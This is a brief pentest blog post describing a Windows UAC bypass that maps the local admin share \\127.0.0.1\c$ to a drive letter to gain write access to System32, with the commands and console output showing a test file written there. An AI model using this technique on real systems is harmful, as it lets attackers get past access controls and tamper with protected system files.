Use IPC BypassUAC


After the actual test, some environments can be successful
In many scenarios, you do not have write permission to the system directory. Here you will use this method to obtain write permission to the file

C:\Windows\System32>net use A: \\127.0.0.1\c$
命令成功完成。

C:\Windows\System32>A:

A:\>cd Windows\System32

A:\Windows\System32>echo test >test111

A:\Windows\System32>dir test111
 驱动器 A 中的卷没有标签。
 卷的序列号是 4C43-ED5B

 A:\Windows\System32 的目录

2021/08/08  15:01                 7 test111
               1 个文件              7 字节
               0 个目录 31,098,544,128 可用字节

A:\Windows\System32>


Author: Yangsir
Reprint policy: All articles in this blog are used except for special statements CC BY 4.0 reprint policy. If reproduced, please indicate source Yangsir !
  TOC